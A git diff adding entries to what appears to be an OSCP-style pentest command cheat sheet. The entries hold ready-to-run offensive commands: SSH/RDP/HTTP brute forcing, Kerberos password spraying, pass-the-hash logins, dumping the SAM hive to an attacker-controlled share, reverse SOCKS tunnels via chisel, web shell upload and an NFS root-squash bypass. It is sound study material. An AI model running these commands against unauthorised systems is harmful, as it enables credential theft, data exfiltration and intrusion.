diff --git a/_commands/autorecon.md b/_commands/autorecon.md
new file mode 100644
index 0000000..c0ee587
--- /dev/null
+++ b/_commands/autorecon.md
@@ -0,0 +1,22 @@
+---
+command: |
+ autorecon $IP
+variants:
+ - label: single
+ command: |
+ autorecon $IP
+ - label: targets-file
+ command: |
+ autorecon -t targets.txt
+ - label: all-ports
+ command: |
+ autorecon $IP --port-scans top-100-ports --service-scans default
+description: Multi-threaded recon wrapper that runs nmap then per-service enumeration automatically
+os: [Linux]
+category: [oscp, cli]
+service: [SMB, HTTP, DNS]
+phase: [Enumeration]
+references:
+ - https://www.kali.org/tools/autorecon/
+ - https://github.com/Tib3rius/AutoRecon
+---
diff --git a/_commands/certipy-auth.md b/_commands/certipy-auth.md
new file mode 100644
index 0000000..89ef8f5
--- /dev/null
+++ b/_commands/certipy-auth.md
@@ -0,0 +1,20 @@
+---
+variants:
+ - label: pfx
+ command: |
+ certipy-ad auth -pfx administrator.pfx -dc-ip $DCIP
+ - label: pfx-user
+ command: |
+ certipy-ad auth -pfx user.pfx -username $USER -domain $DOMAIN -dc-ip $DCIP
+ - label: ldap-shell
+ command: |
+ certipy-ad auth -pfx user.pfx -dc-ip $DCIP -ldap-shell
+description: Authenticate with a certificate via PKINIT to recover a Kerberos TGT and the account NT hash
+os: [Linux]
+category: [oscp, cli]
+service: [ADCS, Kerberos]
+phase: [CredAccess, Exploitation]
+references:
+ - https://www.kali.org/tools/certipy-ad/
+ - https://github.com/ly4k/Certipy
+---
diff --git a/_commands/cewl.md b/_commands/cewl.md
new file mode 100644
index 0000000..95b8620
--- /dev/null
+++ b/_commands/cewl.md
@@ -0,0 +1,11 @@
+---
+command: |
+ cewl -d 2 -m 5 -w words.txt $URL
+description: Spider a site to depth 2 and build a custom wordlist of words 5 chars or longer
+os: [Linux]
+category: [oscp, cli]
+service: [HTTP]
+phase: [Cracking]
+references:
+ - https://www.kali.org/tools/cewl/
+---
diff --git a/_commands/chisel.md b/_commands/chisel.md
new file mode 100644
index 0000000..36d5cee
--- /dev/null
+++ b/_commands/chisel.md
@@ -0,0 +1,26 @@
+---
+variants:
+ - label: server-reverse
+ command: |
+ chisel server -p $LPORT --reverse
+ - label: client-reverse-socks
+ command: |
+ chisel client $LHOST:$LPORT R:socks
+ - label: client-reverse-fwd
+ command: |
+ chisel client $LHOST:$LPORT R:$LPORT:127.0.0.1:3306
+ - label: server-forward-socks
+ command: |
+ chisel server -p $LPORT --socks5
+ - label: client-forward-socks
+ command: |
+ chisel client $IP:$LPORT socks
+description: Fast TCP/UDP tunnel over HTTP for reverse SOCKS proxies and port forwarding through a foothold
+os: [Linux, Windows]
+category: [oscp, cli]
+service: [HTTP]
+phase: [Pivoting]
+references:
+ - https://gitlab.com/kalilinux/packages/chisel
+ - https://github.com/jpillora/chisel
+---
diff --git a/_commands/curl.md b/_commands/curl.md
new file mode 100644
index 0000000..ecf6f9d
--- /dev/null
+++ b/_commands/curl.md
@@ -0,0 +1,25 @@
+---
+variants:
+ - label: get
+ command: |
+ curl -i $URL
+ - label: headers
+ command: |
+ curl -I $URL
+ - label: post-json
+ command: |
+ curl -X POST -H "Content-Type: application/json" -d '{"user":"admin"}' $URL
+ - label: put-upload
+ command: |
+ curl -X PUT --data-binary @shell.php $URL/shell.php
+ - label: proxy
+ command: |
+ curl -k -x http://127.0.0.1:8080 $URL
+description: Transfer data over HTTP for manual web testing, file upload, and proxying through Burp
+os: [Linux]
+category: [oscp, cli]
+service: [HTTP]
+phase: [Enumeration]
+references:
+ - https://www.kali.org/tools/curl/
+---
diff --git a/_commands/dig.md b/_commands/dig.md
new file mode 100644
index 0000000..c6c9ea0
--- /dev/null
+++ b/_commands/dig.md
@@ -0,0 +1,25 @@
+---
+variants:
+ - label: a-record
+ command: |
+ dig $DOMAIN @$IP
+ - label: any
+ command: |
+ dig ANY $DOMAIN @$IP
+ - label: zone-transfer
+ command: |
+ dig AXFR $DOMAIN @$IP
+ - label: reverse
+ command: |
+ dig -x $IP @$IP
+ - label: ns
+ command: |
+ dig NS $DOMAIN @$IP
+description: Query a DNS server for records and attempt a zone transfer against the target nameserver
+os: [Linux]
+category: [oscp, cli]
+service: [DNS]
+phase: [Enumeration]
+references:
+ - https://www.kali.org/tools/bind9/#dig
+---
diff --git a/_commands/dnsenum.md b/_commands/dnsenum.md
new file mode 100644
index 0000000..3d01143
--- /dev/null
+++ b/_commands/dnsenum.md
@@ -0,0 +1,11 @@
+---
+command: |
+ dnsenum --dnsserver $IP $DOMAIN
+description: Enumerate DNS records, attempt zone transfers, and brute force subdomains for a domain
+os: [Linux]
+category: [oscp, cli]
+service: [DNS]
+phase: [Enumeration]
+references:
+ - https://www.kali.org/tools/dnsenum/
+---
diff --git a/_commands/enum4linux.md b/_commands/enum4linux.md
new file mode 100644
index 0000000..227eed3
--- /dev/null
+++ b/_commands/enum4linux.md
@@ -0,0 +1,16 @@
+---
+variants:
+ - label: all-null
+ command: |
+ enum4linux -a $IP
+ - label: all-creds
+ command: |
+ enum4linux -a -u $USER -p $PASSWORD $IP
+description: Enumerate SMB shares, users, groups, and policy over null or authenticated sessions
+os: [Linux]
+category: [oscp, cli]
+service: [SMB]
+phase: [Enumeration]
+references:
+ - https://www.kali.org/tools/enum4linux/
+---
diff --git a/_commands/evil-winrm.md b/_commands/evil-winrm.md
index 37cd02c..c106ab4 100644
--- a/_commands/evil-winrm.md
+++ b/_commands/evil-winrm.md
@@ -1,23 +1,20 @@
 ---
 variants:
- - label: creds
+ - label: password
 command: |
 evil-winrm -i $IP -u $USER -p $PASSWORD
- - label: hash
+ - label: pth
 command: |
 evil-winrm -i $IP -u $USER -H $HASH
- - label: ticket
+ - label: scripts
 command: |
- evil-winrm -i $IP -u $USER -k
- - label: cert
- command: |
- evil-winrm -i $IP -c pub.pem -k priv.pem -S -r $DOMAIN
-description: Interactive WinRM shell, by auth method.
+ evil-winrm -i $IP -u $USER -p $PASSWORD -s /scripts -e /executables
+description: Interactive WinRM shell, by auth method, with upload, download, and script loading
 os: [Linux]
 category: [oscp, cli]
-have: [hash, ticket, cert]
 service: [WinRM]
-phase: [Exploitation]
+phase: [Exploitation, LateralMovement]
 references:
+ - https://www.kali.org/tools/evil-winrm/
 - https://github.com/Hackplayers/evil-winrm
 ---
diff --git a/_commands/ffuf.md b/_commands/ffuf.md
index 5ae0bc3..c5c6d85 100644
--- a/_commands/ffuf.md
+++ b/_commands/ffuf.md
@@ -1,11 +1,23 @@
 ---
-command: |
- ffuf -u http://$IP/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -t 300 -fs 3142
-description: Directory fuzz a web server filtering by response size.
+variants:
+ - label: dir
+ command: |
+ ffuf -u $URL/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
+ - label: vhost
+ command: |
+ ffuf -u $URL -H "Host: FUZZ.$DOMAIN" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs 4242
+ - label: post-login
+ command: |
+ ffuf -u $URL/login -X POST -d "username=admin&password=FUZZ" -w /usr/share/wordlists/rockyou.txt -fc 200
+ - label: params
+ command: |
+ ffuf -u "$URL/?FUZZ=value" -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
+description: Fast web fuzzer for directories, vhosts, login fields, and parameters with response filtering
 os: [Linux]
 category: [oscp, cli]
 service: [HTTP]
 phase: [Enumeration]
 references:
+ - https://www.kali.org/tools/ffuf/
 - https://github.com/ffuf/ffuf
 ---
diff --git a/_commands/fierce.md b/_commands/fierce.md
new file mode 100644
index 0000000..3adf7ed
--- /dev/null
+++ b/_commands/fierce.md
@@ -0,0 +1,11 @@
+---
+command: |
+ fierce --domain $DOMAIN --dns-servers $IP
+description: Locate non-contiguous IP space and hostnames for a domain via DNS scanning
+os: [Linux]
+category: [oscp, cli]
+service: [DNS]
+phase: [Enumeration]
+references:
+ - https://www.kali.org/tools/fierce/
+---
diff --git a/_commands/finalrecon.md b/_commands/finalrecon.md
new file mode 100644
index 0000000..1dc099f
--- /dev/null
+++ b/_commands/finalrecon.md
@@ -0,0 +1,17 @@
+---
+variants:
+ - label: full
+ command: |
+ finalrecon --full --url $URL
+ - label: headers-whois
+ command: |
+ finalrecon --headers --whois --url $URL
+description: All in one web recon covering headers, SSL, whois, DNS, subdomains, and crawling
+os: [Linux]
+category: [oscp, cli]
+service: [HTTP]
+phase: [Enumeration]
+references:
+ - https://www.kali.org/tools/finalrecon/
+ - https://github.com/thewhiteh4t/FinalRecon
+---
diff --git a/_commands/ftp.md b/_commands/ftp.md
new file mode 100644
index 0000000..e986310
--- /dev/null
+++ b/_commands/ftp.md
@@ -0,0 +1,16 @@
+---
+variants:
+ - label: connect
+ command: |
+ ftp $IP
+ - label: anonymous
+ command: |
+ ftp anonymous@$IP
+description: Connect to an FTP service to test anonymous access and browse the file store
+os: [Linux]
+category: [oscp, cli]
+service: [FTP]
+phase: [Enumeration]
+references:
+ - https://www.kali.org/tools/tnftp/
+---
diff --git a/_commands/gobuster.md b/_commands/gobuster.md
new file mode 100644
index 0000000..001412c
--- /dev/null
+++ b/_commands/gobuster.md
@@ -0,0 +1,20 @@
+---
+variants:
+ - label: dir
+ command: |
+ gobuster dir -u $URL -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
+ - label: dns
+ command: |
+ gobuster dns -d $DOMAIN -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
+ - label: vhost
+ command: |
+ gobuster vhost -u $URL -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain
+description: Brute force web content, DNS subdomains, and virtual hosts by mode
+os: [Linux]
+category: [oscp, cli]
+service: [HTTP, DNS]
+phase: [Enumeration]
+references:
+ - https://www.kali.org/tools/gobuster/
+ - https://github.com/OJ/gobuster
+---
diff --git a/_commands/hydra.md b/_commands/hydra.md
new file mode 100644
index 0000000..8426267
--- /dev/null
+++ b/_commands/hydra.md
@@ -0,0 +1,22 @@
+---
+variants:
+ - label: ssh
+ command: |
+ hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://$IP
+ - label: ftp
+ command: |
+ hydra -l $USER -P /usr/share/wordlists/rockyou.txt ftp://$IP
+ - label: http-post-form
+ command: |
+ hydra -l $USER -P /usr/share/wordlists/rockyou.txt $IP http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"
+ - label: rdp
+ command: |
+ hydra -l $USER -P /usr/share/wordlists/rockyou.txt rdp://$IP
+description: Online password brute forcer, by service, for SSH, FTP, HTTP forms, and RDP
+os: [Linux]
+category: [oscp, cli]
+service: [SSH, FTP, HTTP, RDP]
+phase: [CredAccess]
+references:
+ - https://www.kali.org/tools/hydra/
+---
diff --git a/_commands/impacket-reg.md b/_commands/impacket-reg.md
new file mode 100644
index 0000000..0e8256d
--- /dev/null
+++ b/_commands/impacket-reg.md
@@ -0,0 +1,20 @@
+---
+variants:
+ - label: query
+ command: |
+ impacket-reg $DOMAIN/$USER:$PASSWORD@$IP query -keyName HKLM\SOFTWARE -s
+ - label: save-hive
+ command: |
+ impacket-reg $DOMAIN/$USER:$PASSWORD@$IP save -keyName HKLM\SAM -o \\$LHOST\share\sam.save
+ - label: add-key
+ command: |
+ impacket-reg $DOMAIN/$USER:$PASSWORD@$IP add -keyName HKLM\SOFTWARE\Test -v Flag -vt REG_SZ -vd value
+description: Read and write the remote registry over SMB to query keys or dump SAM, SYSTEM, and SECURITY hives
+os: [Linux]
+category: [oscp, cli]
+service: [RPC, SMB]
+phase: [CredAccess, Enumeration]
+references:
+ - https://www.kali.org/tools/impacket-scripts/
+ - https://github.com/fortra/impacket
+---
diff --git a/_commands/impacket-smbclient.md b/_commands/impacket-smbclient.md
new file mode 100644
index 0000000..20d3195
--- /dev/null
+++ b/_commands/impacket-smbclient.md
@@ -0,0 +1,17 @@
+---
+variants:
+ - label: password
+ command: |
+ impacket-smbclient $DOMAIN/$USER:$PASSWORD@$IP
+ - label: pth
+ command: |
+ impacket-smbclient $DOMAIN/$USER@$IP -hashes :$HASH
+description: Interactive SMB client to list shares and get or put files, with pass the hash support
+os: [Linux]
+category: [oscp, cli]
+service: [SMB]
+phase: [Enumeration, LateralMovement]
+references:
+ - https://www.kali.org/tools/impacket-scripts/
+ - https://github.com/fortra/impacket
+---
diff --git a/_commands/john-extractors.md b/_commands/john-extractors.md
new file mode 100644
index 0000000..d8db667
--- /dev/null
+++ b/_commands/john-extractors.md
@@ -0,0 +1,34 @@
+---
+variants:
+ - label: ssh2john
+ command: |
+ ssh2john id_rsa > hash.txt
+ - label: zip2john
+ command: |
+ zip2john secret.zip > hash.txt
+ - label: rar2john
+ command: |
+ rar2john secret.rar > hash.txt
+ - label: office2john
+ command: |
+ office2john document.docx > hash.txt
+ - label: bitlocker2john
+ command: |
+ bitlocker2john -i drive.img > hash.txt
+ - label: keepass2john
+ command: |
+ keepass2john database.kdbx > hash.txt
+ - label: pdf2john
+ command: |
+ pdf2john document.pdf > hash.txt
+ - label: crack
+ command: |
+ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
+description: Extract a crackable hash from an encrypted file with the 2john helpers, then crack it with John
+os: [Linux]
+category: [oscp, cli]
+service: [Files]
+phase: [Cracking]
+references:
+ - https://www.kali.org/tools/john/#bitlocker2john
+---
diff --git a/_commands/kerbrute.md b/_commands/kerbrute.md
new file mode 100644
index 0000000..8a7468a
--- /dev/null
+++ b/_commands/kerbrute.md
@@ -0,0 +1,19 @@
+---
+variants:
+ - label: userenum
+ command: |
+ kerbrute userenum -d $DOMAIN --dc $DCIP /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
+ - label: passwordspray
+ command: |
+ kerbrute passwordspray -d $DOMAIN --dc $DCIP users.txt $PASSWORD
+ - label: bruteuser
+ command: |
+ kerbrute bruteuser -d $DOMAIN --dc $DCIP /usr/share/wordlists/rockyou.txt $USER
+description: Brute force and enumerate AD accounts through Kerberos pre-auth without locking on userenum
+os: [Linux]
+category: [oscp, cli]
+service: [Kerberos]
+phase: [CredAccess, Enumeration]
+references:
+ - https://github.com/ropnop/kerbrute
+---
diff --git a/_commands/medusa.md b/_commands/medusa.md
new file mode 100644
index 0000000..4e80f32
--- /dev/null
+++ b/_commands/medusa.md
@@ -0,0 +1,19 @@
+---
+variants:
+ - label: ssh
+ command: |
+ medusa -h $IP -u $USER -P /usr/share/wordlists/rockyou.txt -M ssh
+ - label: ftp
+ command: |
+ medusa -h $IP -u $USER -P /usr/share/wordlists/rockyou.txt -M ftp
+ - label: smb
+ command: |
+ medusa -h $IP -u $USER -P /usr/share/wordlists/rockyou.txt -M smbnt
+description: Parallel network login brute forcer, by service module, for SSH, FTP, and SMB
+os: [Linux]
+category: [oscp, cli]
+service: [SSH, FTP, SMB]
+phase: [CredAccess]
+references:
+ - https://www.kali.org/tools/medusa/
+---
diff --git a/_commands/nbtscan.md b/_commands/nbtscan.md
new file mode 100644
index 0000000..2945f37
--- /dev/null
+++ b/_commands/nbtscan.md
@@ -0,0 +1,11 @@
+---
+command: |
+ nbtscan $IP/24
+description: Scan a subnet for NetBIOS names to map hostnames, workgroups, and logged in users
+os: [Linux]
+category: [oscp, cli]
+service: [SMB]
+phase: [Enumeration]
+references:
+ - https://www.kali.org/tools/nbtscan/
+---
diff --git a/_commands/nfs-cat.md b/_commands/nfs-cat.md
new file mode 100644
index 0000000..705bca5
--- /dev/null
+++ b/_commands/nfs-cat.md
@@ -0,0 +1,22 @@
+---
+variants:
+ - label: discover
+ command: |
+ nfs-ls -D nfs://$IP
+ - label: list-export
+ command: |
+ nfs-ls nfs://$IP/export
+ - label: read-file
+ command: |
+ nfs-cat nfs://$IP/export/path/file.txt
+ - label: read-as-root
+ command: |
+ nfs-cat nfs://$IP/export/path/file.txt?uid=0&gid=0
+description: Read a file off an NFS export with libnfs, including spoofing uid and gid 0 to bypass root squash
+os: [Linux]
+category: [oscp, cli]
+service: [NFS]
+phase: [Enumeration, PrivEsc]
+references:
+ - https://github.com/sahlberg/libnfs
+---
diff --git a/_commands/nikto.md b/_commands/nikto.md
new file mode 100644
index 0000000..5416cdb
--- /dev/null
+++ b/_commands/nikto.md
@@ -0,0 +1,11 @@
+---
+command: |
+ nikto -h $URL
+description: Scan a web server for known vulnerabilities, dangerous files, and misconfigurations
+os: [Linux]
+category: [oscp, cli]
+service: [HTTP]
+phase: [Enumeration]
+references:
+ - https://www.kali.org/tools/nikto/
+---
diff --git a/_commands/nxc-ftp.md b/_commands/nxc-ftp.md
new file mode 100644
index 0000000..baba1e8
--- /dev/null
+++ b/_commands/nxc-ftp.md
@@ -0,0 +1,16 @@
+---
+variants:
+ - label: auth
+ command: |
+ nxc ftp $IP -u $USER -p $PASSWORD
+ - label: list
+ command: |
+ nxc ftp $IP -u $USER -p $PASSWORD --ls
+description: NetExec over FTP to validate credentials and list the remote directory
+os: [Linux]
+category: [oscp, cli]
+service: [FTP]
+phase: [Enumeration]
+references:
+ - https://www.netexec.wiki/
+---
diff --git a/_commands/nxc-ldap.md b/_commands/nxc-ldap.md
new file mode 100644
index 0000000..b201b17
--- /dev/null
+++ b/_commands/nxc-ldap.md
@@ -0,0 +1,22 @@
+---
+variants:
+ - label: bloodhound
+ command: |
+ nxc ldap $IP -u $USER -p $PASSWORD --bloodhound -c All --dns-server $DCIP
+ - label: asreproast
+ command: |
+ nxc ldap $IP -u $USER -p $PASSWORD --asreproast asrep.txt
+ - label: kerberoast
+ command: |
+ nxc ldap $IP -u $USER -p $PASSWORD --kerberoasting kerb.txt
+ - label: delegation
+ command: |
+ nxc ldap $IP -u $USER -p $PASSWORD --find-delegation
+description: NetExec over LDAP for BloodHound collection, roasting, and delegation discovery
+os: [Linux]
+category: [oscp, cli]
+service: [LDAP, AD]
+phase: [Enumeration, CredAccess]
+references:
+ - https://www.netexec.wiki/
+---
diff --git a/_commands/nxc-mssql.md b/_commands/nxc-mssql.md
new file mode 100644
index 0000000..889a44a
--- /dev/null
+++ b/_commands/nxc-mssql.md
@@ -0,0 +1,19 @@
+---
+variants:
+ - label: auth
+ command: |
+ nxc mssql $IP -u $USER -p $PASSWORD --local-auth
+ - label: query
+ command: |
+ nxc mssql $IP -u $USER -p $PASSWORD -q "SELECT @@version"
+ - label: exec
+ command: |
+ nxc mssql $IP -u $USER -p $PASSWORD -x "whoami"
+description: NetExec over MSSQL to authenticate, run queries, and execute commands via xp_cmdshell
+os: [Linux]
+category: [oscp, cli]
+service: [MSSQL]
+phase: [Exploitation]
+references:
+ - https://www.netexec.wiki/
+---
diff --git a/_commands/nxc-rdp.md b/_commands/nxc-rdp.md
new file mode 100644
index 0000000..e220ffa
--- /dev/null
+++ b/_commands/nxc-rdp.md
@@ -0,0 +1,19 @@
+---
+variants:
+ - label: auth
+ command: |
+ nxc rdp $IP -u $USER -p $PASSWORD
+ - label: screenshot
+ command: |
+ nxc rdp $IP -u $USER -p $PASSWORD --screenshot
+ - label: nla-screenshot
+ command: |
+ nxc rdp $IP -u '' -p '' --nla-screenshot
+description: NetExec over RDP to test access and screenshot the logon or session desktop
+os: [Linux]
+category: [oscp, cli]
+service: [RDP]
+phase: [Enumeration]
+references:
+ - https://www.netexec.wiki/
+---
diff --git a/_commands/nxc-ssh.md b/_commands/nxc-ssh.md
new file mode 100644
index 0000000..81654d1
--- /dev/null
+++ b/_commands/nxc-ssh.md
@@ -0,0 +1,16 @@
+---
+variants:
+ - label: auth
+ command: |
+ nxc ssh $IP -u $USER -p $PASSWORD
+ - label: exec
+ command: |
+ nxc ssh $IP -u $USER -p $PASSWORD -x "id"
+description: NetExec over SSH to spray credentials and run a command on success
+os: [Linux]
+category: [oscp, cli]
+service: [SSH]
+phase: [Exploitation, CredAccess]
+references:
+ - https://www.netexec.wiki/
+---
diff --git a/_commands/nxc-winrm.md b/_commands/nxc-winrm.md
new file mode 100644
index 0000000..901e44d
--- /dev/null
+++ b/_commands/nxc-winrm.md
@@ -0,0 +1,19 @@
+---
+variants:
+ - label: auth
+ command: |
+ nxc winrm $IP -u $USER -p $PASSWORD
+ - label: pth
+ command: |
+ nxc winrm $IP -u $USER -H $HASH
+ - label: exec
+ command: |
+ nxc winrm $IP -u $USER -p $PASSWORD -x "whoami"
+description: NetExec over WinRM to validate access and run commands, with pass the hash support
+os: [Linux]
+category: [oscp, cli]
+service: [WinRM]
+phase: [Exploitation, LateralMovement]
+references:
+ - https://www.netexec.wiki/
+---